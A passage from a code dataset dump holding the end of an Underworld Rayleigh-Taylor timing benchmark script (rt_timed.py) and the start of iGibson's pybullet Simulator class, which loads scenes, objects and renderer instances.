particlesPerCell=40 )\nswarm.populate_using_layout( layout=swarmLayout )\n\n\n\n# define these for convience. \ndenseIndex = 0\nlightIndex = 1\n\n# material perturbation from van Keken et al. 1997\nwavelength = 2.0\namplitude = 0.02\noffset = 0.2\nk = 2. * math.pi / wavelength\n\n# Create function to return particle's coordinate\ncoord = fn.coord()\n\n# Define the material perturbation, a function of the x coordinate (accessed by `coord[0]`).\nperturbationFn = offset + amplitude*fn.math.cos( k*coord[0] )\n\n# Setup the conditions list. \n# If z is less than the perturbation, set to lightIndex.\nconditions = [ ( perturbationFn > coord[1] , lightIndex ),\n ( True , denseIndex ) ]\n\n# The swarm is passed as an argument to the evaluation, providing evaluation on each particle.\n# Results are written to the materialIndex swarm variable.\nfnc = fn.branching.conditional( conditions )\nmatdat = fnc.evaluate(swarm)\nmaterialIndex.data[:] = matdat\n\nstore = glucifer.Store('{}_RT'.format(PREFIX),compress=False)\n\nfig = glucifer.Figure( store, name=\"firstFig\" )\nfig.append( glucifer.objects.Points(swarm, materialIndex, pointSize=2, colourBar=False) )\nfig.append( glucifer.objects.Surface(mesh, pressureField))\nfig.append( glucifer.objects.VectorArrows( mesh, velocityField, scaling=1.0e2))\n\n\n# Set a density of '0.' for light material, '1.' for dense material.\ndensityMap = { lightIndex:0., denseIndex:1. }\ndensityFn = fn.branching.map( fn_key = materialIndex, mapping = densityMap )\n\n# Set a viscosity value of '1.' for both materials.\nviscosityMap = { lightIndex:1., denseIndex:1. }\nfn_viscosity = fn.branching.map( fn_key = materialIndex, mapping = viscosityMap )\n\n# Define a vertical unit vector using a python tuple.\nz_hat = ( 0., 0., 1. )\n\n# Create buoyancy force vector\nbuoyancyFn = -densityFn*z_hat\n\n\n# Construct node sets using the mesh specialSets\niWalls = mesh.specialSets[\"MinI_VertexSet\"] + mesh.specialSets[\"MaxI_VertexSet\"]\njWalls = mesh.specialSets[\"MinJ_VertexSet\"] + mesh.specialSets[\"MaxJ_VertexSet\"]\nkWalls = mesh.specialSets[\"MinK_VertexSet\"] + mesh.specialSets[\"MaxK_VertexSet\"]\n\nallWalls = iWalls + jWalls + kWalls\n\n# Prescribe degrees of freedom on each node to be considered Dirichlet conditions.\n# In the x direction on allWalls flag as Dirichlet\n# In the y direction on jWalls (horizontal) flag as Dirichlet\nstokesBC = uw.conditions.DirichletCondition( variable = velocityField,\n indexSetsPerDof = (allWalls, allWalls, kWalls))\nadvdiffBc = uw.conditions.DirichletCondition( variable = temperatureField,\n indexSetsPerDof = kWalls )\n\nstokes = uw.systems.Stokes( velocityField = velocityField,\n pressureField = pressureField,\n# voronoi_swarm = swarm,\n conditions = stokesBC,\n fn_viscosity = fn_viscosity, \n fn_bodyforce = buoyancyFn )\n\nsolver = uw.systems.Solver( stokes )\n\n# Create a system to advect the swarm\nadvector = uw.systems.SwarmAdvector( swarm=swarm, velocityField=velocityField, order=2 )\n\n# Create a dummy temperature field.\nadvdiff = uw.systems.AdvectionDiffusion(velocityField=velocityField, phiField=temperatureField, phiDotField=temperatureFieldDeriv, \n fn_diffusivity=1.,conditions=advdiffBc)\n\n\n# functions for calculating RMS velocity\nvdotv = fn.math.dot(velocityField,velocityField)\nv2sum_integral = uw.utils.Integral( mesh=mesh, fn=vdotv )\nvolume_integral = uw.utils.Integral( mesh=mesh, fn=1. )\n\n\n# Get instantaneous Stokes solution\nsolver.solve()\n# Calculate the RMS velocity.\nvrms = math.sqrt( v2sum_integral.evaluate()[0] )\n\n\n# update \ndt1 = advector.get_max_dt()\ndt2 = advdiff.get_max_dt()\ndt = min(dt1,dt2)\n# Advect using this timestep size.\nadvector.integrate(dt)\n\nadvdiff.integrate(dt)\n\n# Save things\n\nif do_IO:\n\tmeshFileHandle = mesh.save(\"{}_Mesh.h5\".format(PREFIX))\n\n\tvFH = velocityField.save(\"{}_velocityField.h5\".format(PREFIX))\n\tvelocityField.xdmf( \"{}_velocityField\".format(PREFIX), vFH, \"velocity\", meshFileHandle, \"Mesh\" )\n\n\tswarmFileHandle = swarm.save(\"{}_Swarm.h5\".format(PREFIX))\n\tmH = materialIndex.save(\"{}_materialIndex.h5\".format(PREFIX))\n\tmaterialIndex.xdmf(\"{}_materialIndex\".format(PREFIX), mH, \"material\", swarmFileHandle, \"Swarm\" )\n\n\tfig.save()\n\n\t# load things\n\t# first\t create analogues\n\tmesh_copy = uw.mesh.FeMesh_Cartesian(\n elementRes = (res, res, res),\n minCoord = (20., 20., 20.),\n maxCoord = (33., 33., 33.))\n\n\tvelocityField_copy = uw.mesh.MeshVariable( mesh=mesh_copy, nodeDofCount=3 )\n\n\tswarm_copy = uw.swarm.Swarm(mesh = mesh_copy)\n\tmaterialIndex_copy = swarm_copy.add_variable( dataType=\"int\", count=1 )\n\n\t# now load data and check loaded versions are identical to originals\n\tmesh_copy.load(\"{}_Mesh.h5\".format(PREFIX))\n\n\t# test\n\tif not np.allclose(mesh_copy.data, mesh.data):\n\t raise RuntimeError(\"Loaded mesh data does not appear to be identical to previous data.\")\n\tvelocityField_copy.load(\"{}_velocityField.h5\".format(PREFIX))\n\tif not np.allclose(velocityField_copy.data, velocityField.data):\n\t raise RuntimeError(\"Loaded velocity data does not appear to be identical to previous data.\")\n\n\n\tswarm_copy.load(\"{}_Swarm.h5\".format(PREFIX))\n\n\tif not np.allclose(swarm_copy.particleCoordinates.data, swarm.particleCoordinates.data):\n\t\traise RuntimeError(\"Loaded swarm data does not appear to be identical to previous data.\")\n\tmaterialIndex_copy.load(\"{}_materialIndex.h5\".format(PREFIX))\n\tif not np.allclose(materialIndex_copy.data, materialIndex.data):\n\t raise RuntimeError(\"Loaded material data does not appear to be identical to previous data.\")\n\nuw.timing.stop()\nmodule_timing_data_orig = uw.timing.get_data(group_by=\"routine\")\n\n# write out data\nfilename = \"{}_Res_{}_Nproc_{}_SlurmID_{}\".format(os.environ[\"SLURM_JOB_NAME\"],res,uw.mpi.size,os.environ[\"SLURM_JOB_ID\"])\nimport json\nif module_timing_data_orig:\n module_timing_data = {}\n for key,val in module_timing_data_orig.items():\n module_timing_data[key[0]] = val\n other_timing[\"Total_Runtime\"] = uw.timing._endtime-uw.timing._starttime\n module_timing_data[\"Other_timing\"] = other_timing\n module_timing_data[\"Other_data\"] = {\"vrms\":vrms, \"res\":res, \"nproc\":uw.mpi.size}\n with open(filename+\".json\", 'w') as fp:\n json.dump(module_timing_data, fp,sort_keys=True, indent=4)\n\nuw.timing.print_table(group_by=\"routine\", output_file=filename+\".txt\", display_fraction=0.99)\n","sub_path":"rt_timed.py","file_name":"rt_timed.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384748746","text":"import ctypes\nimport logging\nimport os\nimport platform\nimport time\nfrom time import sleep\n\nimport numpy as np\nimport pybullet as p\n\nimport igibson\nfrom igibson.object_states.factory import get_states_by_dependency_order\nfrom igibson.objects.articulated_object import ArticulatedObject, URDFObject\nfrom igibson.objects.multi_object_wrappers import ObjectGrouper, ObjectMultiplexer\nfrom igibson.objects.object_base import Object\nfrom igibson.objects.particles import Particle, ParticleSystem\nfrom igibson.objects.stateful_object import StatefulObject\nfrom igibson.objects.visual_marker import VisualMarker\nfrom igibson.render.mesh_renderer.instances import Instance, InstanceGroup\nfrom igibson.render.mesh_renderer.mesh_renderer_cpu import MeshRenderer\nfrom igibson.render.mesh_renderer.mesh_renderer_settings import MeshRendererSettings\nfrom igibson.render.mesh_renderer.mesh_renderer_tensor import MeshRendererG2G\nfrom igibson.render.mesh_renderer.mesh_renderer_vr import MeshRendererVR, VrSettings\nfrom igibson.render.viewer import Viewer, ViewerSimple, ViewerVR\nfrom igibson.robots.behavior_robot import BehaviorRobot\nfrom igibson.robots.robot_base import BaseRobot\nfrom igibson.scenes.igibson_indoor_scene import InteractiveIndoorScene\nfrom igibson.scenes.scene_base import Scene\nfrom igibson.utils.assets_utils import get_ig_avg_category_specs\nfrom igibson.utils.constants import PyBulletSleepState, SemanticClass\nfrom igibson.utils.mesh_util import quat2rotmat, xyz2mat, xyzw2wxyz\nfrom igibson.utils.semantics_utils import get_class_name_to_class_id\nfrom igibson.utils.utils import quatXYZWFromRotMat\nfrom igibson.utils.vr_utils import VR_CONTROLLERS, VR_DEVICES, VrData, calc_offset, calc_z_rot_from_right\n\n\nclass Simulator:\n \"\"\"\n Simulator class is a wrapper of physics simulator (pybullet) and MeshRenderer, it loads objects into\n both pybullet and also MeshRenderer and syncs the pose of objects and robot parts.\n \"\"\"\n\n def __init__(\n self,\n gravity=9.8,\n physics_timestep=1 / 120.0,\n render_timestep=1 / 30.0,\n solver_iterations=100,\n mode=\"gui\",\n image_width=128,\n image_height=128,\n vertical_fov=90,\n device_idx=0,\n render_to_tensor=False,\n rendering_settings=MeshRendererSettings(),\n vr_settings=VrSettings(),\n ):\n \"\"\"\n :param gravity: gravity on z direction.\n :param physics_timestep: timestep of physical simulation, p.stepSimulation()\n :param render_timestep: timestep of rendering, and Simulator.step() function\n :param solver_iterations: number of solver iterations to feed into pybullet, can be reduced to increase speed.\n pybullet default value is 50.\n :param use_variable_step_num: whether to use a fixed (1) or variable physics step number\n :param mode: choose mode from gui, headless, iggui (only open iGibson UI), or pbgui(only open pybullet UI)\n :param image_width: width of the camera image\n :param image_height: height of the camera image\n :param vertical_fov: vertical field of view of the camera image in degrees\n :param device_idx: GPU device index to run rendering on\n :param render_to_tensor: Render to GPU tensors\n disable it when you want to run multiple physics step but don't need to visualize each frame\n :param rendering_settings: settings to use for mesh renderer\n :param vr_settings: settings to use for VR in simulator and MeshRendererVR\n \"\"\"\n # physics simulator\n self.gravity = gravity\n self.physics_timestep = physics_timestep\n self.render_timestep = render_timestep\n self.solver_iterations = solver_iterations\n self.physics_timestep_num = self.render_timestep / self.physics_timestep\n assert self.physics_timestep_num.is_integer(), \"render_timestep must be a multiple of physics_timestep\"\n self.physics_timestep_num = int(self.physics_timestep_num)\n\n self.mode = mode\n\n self.scene = None\n\n self.particle_systems = []\n\n # TODO: remove this, currently used for testing only\n self.objects = []\n\n plt = platform.system()\n if plt == \"Darwin\" and self.mode == \"gui\":\n self.mode = \"iggui\" # for mac os disable pybullet rendering\n logging.warn(\n \"Rendering both iggui and pbgui is not supported on mac, choose either pbgui or \"\n \"iggui. Default to iggui.\"\n )\n if plt == \"Windows\" and self.mode in [\"vr\"]:\n # By default, windows does not provide ms level timing accuracy\n winmm = ctypes.WinDLL(\"winmm\")\n winmm.timeBeginPeriod(1)\n\n self.use_pb_renderer = False\n self.use_ig_renderer = False\n self.use_vr_renderer = False\n self.use_simple_viewer = False\n\n if self.mode in [\"gui\", \"iggui\"]:\n self.use_ig_renderer = True\n\n if self.mode in [\"gui\", \"pbgui\"]:\n self.use_pb_renderer = True\n\n if self.mode in [\"vr\"]:\n self.use_vr_renderer = True\n rendering_settings.blend_highlight = True\n\n if self.mode in [\"simple\"]:\n self.use_simple_viewer = True\n\n # Starting position for the VR (default set to None if no starting position is specified by the user)\n self.vr_start_pos = None\n self.eye_tracking_data = None\n self.max_haptic_duration = 4000\n self.image_width = image_width\n self.image_height = image_height\n self.vertical_fov = vertical_fov\n self.device_idx = device_idx\n self.render_to_tensor = render_to_tensor\n\n self.optimized_renderer = rendering_settings.optimized\n self.rendering_settings = rendering_settings\n self.viewer = None\n self.vr_settings = vr_settings\n self.vr_overlay_initialized = False\n # We must be using the Simulator's vr mode and have use_vr set to true in the settings to access the VR context\n self.can_access_vr_context = self.use_vr_renderer and self.vr_settings.use_vr\n # Duration of a vsync frame - assumes 90Hz refresh rate\n self.vsync_frame_dur = 11.11e-3\n # Get expected number of vsync frames per iGibson frame\n # Note: currently assumes a 90Hz VR system\n self.vsync_frame_num = int(round(self.render_timestep / self.vsync_frame_dur))\n # Total amount of time we want non-blocking actions to take each frame\n # Leave a small amount of time before the last vsync, just in case we overrun\n self.non_block_frame_time = (self.vsync_frame_num - 1) * self.vsync_frame_dur + (\n 5e-3 if self.vr_settings.curr_device == \"OCULUS\" else 10e-3\n )\n # Timing variables for functions called outside of step() that also take up frame time\n self.frame_end_time = None\n self.main_vr_robot = None\n\n # Variables for data saving and replay in VR\n self.last_physics_timestep = -1\n self.last_render_timestep = -1\n self.last_physics_step_num = -1\n self.last_frame_dur = -1\n self.frame_count = 0\n\n self.load()\n\n self.class_name_to_class_id = get_class_name_to_class_id()\n self.body_links_awake = 0\n # First sync always sync all objects (regardless of their sleeping states)\n self.first_sync = True\n # Set of categories that can be grasped by assisted grasping\n self.assist_grasp_category_allow_list = set()\n self.gen_assisted_grasping_categories()\n self.assist_grasp_mass_thresh = 10.0\n\n self.object_state_types = get_states_by_dependency_order()\n\n def set_timestep(self, physics_timestep, render_timestep):\n \"\"\"\n Set physics timestep and render (action) timestep\n\n :param physics_timestep: physics timestep for pybullet\n :param render_timestep: rendering timestep for renderer\n \"\"\"\n self.physics_timestep = physics_timestep\n self.render_timestep = render_timestep\n p.setTimeStep(self.physics_timestep)\n\n def set_render_timestep(self, render_timestep):\n \"\"\"\n :param render_timestep: render timestep to set in the Simulator\n \"\"\"\n self.render_timestep = render_timestep\n\n def add_viewer(self):\n \"\"\"\n Attach a debugging viewer to the renderer.\n This will make the step much slower so should be avoided when training agents\n \"\"\"\n if self.use_vr_renderer:\n self.viewer = ViewerVR(\n self.vr_settings.use_companion_window, frame_save_path=self.vr_settings.frame_save_path\n )\n elif self.use_simple_viewer:\n self.viewer = ViewerSimple()\n else:\n self.viewer = Viewer(simulator=self, renderer=self.renderer)\n self.viewer.renderer = self.renderer\n\n def reload(self):\n \"\"\"\n Destroy the MeshRenderer and physics simulator and start again.\n \"\"\"\n self.disconnect()\n self.load()\n\n def load(self):\n \"\"\"\n Set up MeshRenderer and physics simulation client. Initialize the list of objects.\n \"\"\"\n if self.render_to_tensor:\n self.renderer = MeshRendererG2G(\n width=self.image_width,\n height=self.image_height,\n vertical_fov=self.vertical_fov,\n device_idx=self.device_idx,\n rendering_settings=self.rendering_settings,\n simulator=self,\n )\n elif self.use_vr_renderer:\n self.renderer = MeshRendererVR(\n rendering_settings=self.rendering_settings, vr_settings=self.vr_settings, simulator=self\n )\n else:\n self.renderer = MeshRenderer(\n width=self.image_width,\n height=self.image_height,\n vertical_fov=self.vertical_fov,\n device_idx=self.device_idx,\n rendering_settings=self.rendering_settings,\n simulator=self,\n )\n\n # print(\"******************PyBullet Logging Information:\")\n if self.use_pb_renderer:\n self.cid = p.connect(p.GUI)\n else:\n self.cid = p.connect(p.DIRECT)\n\n # Simulation reset is needed for deterministic action replay\n if self.vr_settings.reset_sim:\n p.resetSimulation()\n p.setPhysicsEngineParameter(deterministicOverlappingPairs=1)\n p.setPhysicsEngineParameter(numSolverIterations=self.solver_iterations)\n p.setTimeStep(self.physics_timestep)\n p.setGravity(0, 0, -self.gravity)\n p.setPhysicsEngineParameter(enableFileCaching=0)\n self.visual_objects = {}\n self.robots = []\n self.scene = None\n if (self.use_ig_renderer or self.use_vr_renderer or self.use_simple_viewer) and not self.render_to_tensor:\n self.add_viewer()\n\n def load_without_pybullet_vis(load_func):\n \"\"\"\n Load without pybullet visualizer\n \"\"\"\n\n def wrapped_load_func(*args, **kwargs):\n p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, False)\n res = load_func(*args, **kwargs)\n p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, True)\n return res\n\n return wrapped_load_func\n\n @load_without_pybullet_vis\n def import_scene(\n self,\n scene,\n texture_scale=1.0,\n load_texture=True,\n render_floor_plane=False,\n class_id=SemanticClass.SCENE_OBJS,\n ):\n \"\"\"\n Import a scene into the simulator. A scene could be a synthetic one or a realistic Gibson Environment.\n\n :param scene: Scene object\n :param texture_scale: Option to scale down the texture for rendering\n :param load_texture: If you don't need rgb output, texture loading could be skipped to make rendering faster\n :param render_floor_plane: Whether to render the additionally added floor plane\n :param class_id: Class id for rendering semantic segmentation\n :return: pybullet body ids from scene.load function\n \"\"\"\n assert isinstance(scene, Scene) and not isinstance(\n scene, InteractiveIndoorScene\n ), \"import_scene can only be called with Scene that is not InteractiveIndoorScene\"\n # Load the scene. Returns a list of pybullet ids of the objects loaded that we can use to\n # load them in the renderer\n new_object_pb_ids = scene.load()\n self.objects += new_object_pb_ids\n\n # Load the objects in the renderer\n for new_object_pb_id in new_object_pb_ids:\n self.load_object_in_renderer(\n new_object_pb_id,\n class_id=class_id,\n texture_scale=texture_scale,\n load_texture=load_texture,\n render_floor_plane=render_floor_plane,\n use_pbr=False,\n use_pbr_mapping=False,\n )\n\n # TODO: add instance renferencing for iG v1 scenes\n\n self.scene = scene\n\n # Load the states of all the objects in the scene.\n for obj in scene.get_objects():\n if isinstance(obj, StatefulObject):\n if isinstance(obj, ObjectMultiplexer):\n for sub_obj in obj._multiplexed_objects:\n if isinstance(sub_obj, ObjectGrouper):\n for group_sub_obj in sub_obj.objects:\n for state in group_sub_obj.states.values():\n state.initialize(self)\n else:\n for state in sub_obj.states.values():\n state.initialize(self)\n else:\n for state in obj.states.values():\n state.initialize(self)\n\n return new_object_pb_ids\n\n @load_without_pybullet_vis\n def import_ig_scene(self, scene):\n \"\"\"\n Import scene from iGSDF class\n\n :param scene: iGSDFScene instance\n :return: pybullet body ids from scene.load function\n \"\"\"\n assert isinstance(\n scene, InteractiveIndoorScene\n ), \"import_ig_scene can only be called with InteractiveIndoorScene\"\n if not self.use_pb_renderer:\n scene.set_ignore_visual_shape(True)\n # skip loading visual shape if not using pybullet visualizer\n\n new_object_ids = scene.load()\n self.objects += new_object_ids\n\n for body_id, visual_mesh_to_material, link_name_to_vm in zip(\n new_object_ids, scene.visual_mesh_to_material, scene.link_name_to_vm\n ):\n use_pbr = True\n use_pbr_mapping = True\n shadow_caster = True\n physical_object = scene.objects_by_id[body_id]\n if scene.scene_source == \"IG\":\n if physical_object.category in [\"walls\", \"floors\", \"ceilings\"]:\n use_pbr = False\n use_pbr_mapping = False\n if physical_object.category == \"ceilings\":\n shadow_caster = False\n class_id = self.class_name_to_class_id.get(physical_object.category, SemanticClass.SCENE_OBJS)\n self.load_articulated_object_in_renderer(\n body_id,\n class_id=class_id,\n visual_mesh_to_material=visual_mesh_to_material,\n link_name_to_vm=link_name_to_vm,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n physical_object=physical_object,\n )\n\n self.scene = scene\n\n # Load the states of all the objects in the scene.\n for obj in scene.get_objects():\n if isinstance(obj, StatefulObject):\n if isinstance(obj, ObjectMultiplexer):\n for sub_obj in obj._multiplexed_objects:\n if isinstance(sub_obj, ObjectGrouper):\n for group_sub_obj in sub_obj.objects:\n for state in group_sub_obj.states.values():\n state.initialize(self)\n else:\n for state in sub_obj.states.values():\n state.initialize(self)\n else:\n for state in obj.states.values():\n state.initialize(self)\n\n return new_object_ids\n\n @load_without_pybullet_vis\n def import_particle_system(self, obj):\n \"\"\"\n Import an object into the simulator\n :param obj: ParticleSystem to load\n \"\"\"\n\n assert isinstance(obj, ParticleSystem), \"import_particle_system can only be called with ParticleSystem\"\n\n self.particle_systems.append(obj)\n obj.initialize(self)\n\n @load_without_pybullet_vis\n def import_object(\n self, obj, class_id=SemanticClass.USER_ADDED_OBJS, use_pbr=True, use_pbr_mapping=True, shadow_caster=True\n ):\n \"\"\"\n Import an object into the simulator\n\n :param obj: Object to load\n :param class_id: Class id for rendering semantic segmentation\n :param use_pbr: Whether to use pbr\n :param use_pbr_mapping: Whether to use pbr mapping\n :param shadow_caster: Whether to cast shadow\n \"\"\"\n assert isinstance(obj, Object), \"import_object can only be called with Object\"\n\n if isinstance(obj, VisualMarker) or isinstance(obj, Particle):\n # Marker objects can be imported without a scene.\n new_object_pb_id_or_ids = obj.load()\n else:\n # Non-marker objects require a Scene to be imported.\n assert self.scene is not None, \"A scene must be imported before additional objects can be imported.\"\n # Load the object in pybullet. Returns a pybullet id that we can use to load it in the renderer\n new_object_pb_id_or_ids = self.scene.add_object(obj, _is_call_from_simulator=True)\n\n # If no new bodies are immediately imported into pybullet, we have no rendering steps.\n if new_object_pb_id_or_ids is None:\n return None\n\n if isinstance(new_object_pb_id_or_ids, list):\n new_object_pb_ids = new_object_pb_id_or_ids\n else:\n new_object_pb_ids = [new_object_pb_id_or_ids]\n self.objects += new_object_pb_ids\n\n for i, new_object_pb_id in enumerate(new_object_pb_ids):\n if isinstance(obj, ArticulatedObject) or isinstance(obj, URDFObject):\n if isinstance(obj, ArticulatedObject):\n visual_mesh_to_material = None\n else:\n visual_mesh_to_material = obj.visual_mesh_to_material[i]\n link_name_to_vm = obj.link_name_to_vm[i]\n self.load_articulated_object_in_renderer(\n new_object_pb_id,\n class_id=class_id,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n visual_mesh_to_material=visual_mesh_to_material,\n link_name_to_vm=link_name_to_vm,\n shadow_caster=shadow_caster,\n physical_object=obj,\n )\n else:\n softbody = obj.__class__.__name__ == \"SoftObject\"\n self.load_object_in_renderer(\n new_object_pb_id,\n class_id=class_id,\n softbody=softbody,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n physical_object=obj,\n )\n\n # Finally, initialize the object's states\n if isinstance(obj, StatefulObject):\n if isinstance(obj, ObjectMultiplexer):\n for sub_obj in obj._multiplexed_objects:\n if isinstance(sub_obj, ObjectGrouper):\n for group_sub_obj in sub_obj.objects:\n for state in group_sub_obj.states.values():\n state.initialize(self)\n else:\n for state in sub_obj.states.values():\n state.initialize(self)\n else:\n for state in obj.states.values():\n state.initialize(self)\n\n return new_object_pb_id_or_ids\n\n @load_without_pybullet_vis\n def load_visual_sphere(self, radius, color=[1, 0, 0]):\n \"\"\"\n Load a visual-only (not controlled by pybullet) sphere into the renderer.\n Such a sphere can be moved around without affecting PyBullet determinism.\n :param radius: the radius of the visual sphere in meters\n :param color: RGB color of sphere (from 0 to 1 on each axis)\n \"\"\"\n sphere_file = os.path.join(igibson.assets_path, \"models/mjcf_primitives/sphere8.obj\")\n self.renderer.load_object(\n sphere_file,\n transform_orn=[0, 0, 0, 1],\n transform_pos=[0, 0, 0],\n input_kd=[1, 0, 0],\n scale=[radius, radius, radius],\n )\n visual_object = len(self.renderer.get_visual_objects()) - 1\n self.renderer.add_instance(\n visual_object,\n pybullet_uuid=0, # this can be ignored\n class_id=1, # this can be ignored\n dynamic=False,\n softbody=False,\n use_pbr=False,\n use_pbr_mapping=False,\n shadow_caster=False,\n )\n # Return instance so we can control it\n return self.renderer.instances[-1]\n\n @load_without_pybullet_vis\n def load_object_in_renderer(\n self,\n object_pb_id,\n class_id=None,\n softbody=False,\n texture_scale=1.0,\n load_texture=True,\n render_floor_plane=False,\n use_pbr=True,\n use_pbr_mapping=True,\n shadow_caster=True,\n physical_object=None,\n ):\n \"\"\"\n Load the object into renderer\n :param object_pb_id: pybullet body id\n :param class_id: Class id for rendering semantic segmentation\n :param softbody: Whether the object is soft body\n :param texture_scale: Texture scale\n :param load_texture: If you don't need rgb output, texture loading could be skipped to make rendering faster\n :param render_floor_plane: Whether to render the additionally added floor plane\n :param use_pbr: Whether to use pbr\n :param use_pbr_mapping: Whether to use pbr mapping\n :param shadow_caster: Whether to cast shadow\n :param physical_object: The reference to Object class\n \"\"\"\n\n # Load object in renderer, use visual shape and base_link frame\n # not CoM frame\n # Do not load URDFObject or ArticulatedObject with this function\n if physical_object is not None and (\n isinstance(physical_object, ArticulatedObject) or isinstance(physical_object, URDFObject)\n ):\n raise ValueError(\"loading articulated object with load_object_in_renderer function\")\n\n for shape in p.getVisualShapeData(object_pb_id):\n id, link_id, type, dimensions, filename, rel_pos, rel_orn, color = shape[:8]\n dynamics_info = p.getDynamicsInfo(id, link_id)\n inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]\n rel_pos, rel_orn = p.multiplyTransforms(*p.invertTransform(inertial_pos, inertial_orn), rel_pos, rel_orn)\n # visual meshes frame are transformed from the urdfLinkFrame as origin to comLinkFrame as origin\n visual_object = None\n if type == p.GEOM_MESH:\n filename = filename.decode(\"utf-8\")\n if (filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn)) not in self.visual_objects.keys():\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n texture_scale=texture_scale,\n load_texture=load_texture,\n )\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))] = (\n len(self.renderer.visual_objects) - 1\n )\n visual_object = self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))]\n elif type == p.GEOM_SPHERE:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/sphere8.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[0] / 0.5, dimensions[0] / 0.5, dimensions[0] / 0.5],\n )\n visual_object = len(self.renderer.get_visual_objects()) - 1\n elif type == p.GEOM_CAPSULE or type == p.GEOM_CYLINDER:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[1] / 0.5, dimensions[1] / 0.5, dimensions[0]],\n )\n visual_object = len(self.renderer.get_visual_objects()) - 1\n elif type == p.GEOM_BOX:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n )\n visual_object = len(self.renderer.visual_objects) - 1\n elif type == p.GEOM_PLANE:\n # By default, we add an additional floor surface to \"smooth out\" that of the original mesh.\n # Normally you don't need to render this additionally added floor surface.\n # However, if you do want to render it for some reason, you can set render_floor_plane to be True.\n if render_floor_plane:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[100, 100, 0.01],\n )\n visual_object = len(self.renderer.visual_objects) - 1\n if visual_object is not None:\n self.renderer.add_instance(\n visual_object,\n pybullet_uuid=object_pb_id,\n class_id=class_id,\n dynamic=True,\n softbody=softbody,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n )\n if physical_object is not None:\n physical_object.renderer_instances.append(self.renderer.instances[-1])\n\n @load_without_pybullet_vis\n def load_articulated_object_in_renderer(\n self,\n object_pb_id,\n physical_object,\n link_name_to_vm,\n class_id=None,\n visual_mesh_to_material=None,\n use_pbr=True,\n use_pbr_mapping=True,\n shadow_caster=True,\n ):\n \"\"\"\n Load the articulated object into renderer\n\n :param object_pb_id: pybullet body id\n :param physical_object: The reference to Object class\n :param link_name_to_vm: mapping from link name to a list of visual mesh file paths\n :param class_id: Class id for rendering semantic segmentation\n :param visual_mesh_to_material: mapping from visual mesh to randomizable materials\n :param use_pbr: Whether to use pbr\n :param use_pbr_mapping: Whether to use pbr mapping\n :param shadow_caster: Whether to cast shadow\n \"\"\"\n # Load object in renderer, use visual shape from physical_object class\n # using CoM frame\n # only load URDFObject or ArticulatedObject with this function\n if not (\n isinstance(physical_object, ArticulatedObject)\n or isinstance(physical_object, URDFObject)\n or isinstance(physical_object, ObjectMultiplexer)\n ):\n raise ValueError(\"loading non-articulated object with load_articulated_object_in_renderer function\")\n\n visual_objects = []\n link_ids = []\n poses_rot = []\n poses_trans = []\n color = [0, 0, 0]\n for link_id in list(range(p.getNumJoints(object_pb_id))) + [-1]:\n if link_id == -1:\n link_name = p.getBodyInfo(object_pb_id)[0].decode(\"utf-8\")\n else:\n link_name = p.getJointInfo(object_pb_id, link_id)[12].decode(\"utf-8\")\n\n collision_shapes = p.getCollisionShapeData(object_pb_id, link_id)\n collision_shapes = [item for item in collision_shapes if item[2] == p.GEOM_MESH]\n # a link can have multiple collision meshes due to boxification,\n # and we want to query the original collision mesh for information\n\n if len(collision_shapes) == 0:\n continue\n else:\n _, _, type, dimensions, filename, rel_pos, rel_orn = collision_shapes[0]\n\n filenames = link_name_to_vm[link_name]\n for filename in filenames:\n overwrite_material = None\n if visual_mesh_to_material is not None and filename in visual_mesh_to_material:\n overwrite_material = visual_mesh_to_material[filename]\n\n if (\n filename,\n tuple(dimensions),\n tuple(rel_pos),\n tuple(rel_orn),\n ) not in self.visual_objects.keys() or overwrite_material is not None:\n # if the object has an overwrite material, always create a\n # new visual object even if the same visual shape exsits\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n overwrite_material=overwrite_material,\n )\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))] = (\n len(self.renderer.visual_objects) - 1\n )\n visual_objects.append(\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))]\n )\n link_ids.append(link_id)\n\n if link_id == -1:\n pos, orn = p.getBasePositionAndOrientation(object_pb_id)\n else:\n pos, orn = p.getLinkState(object_pb_id, link_id)[:2]\n poses_rot.append(np.ascontiguousarray(quat2rotmat(xyzw2wxyz(orn))))\n poses_trans.append(np.ascontiguousarray(xyz2mat(pos)))\n\n self.renderer.add_instance_group(\n object_ids=visual_objects,\n link_ids=link_ids,\n pybullet_uuid=object_pb_id,\n class_id=class_id,\n poses_trans=poses_trans,\n poses_rot=poses_rot,\n dynamic=True,\n robot=None,\n use_pbr=use_pbr,\n 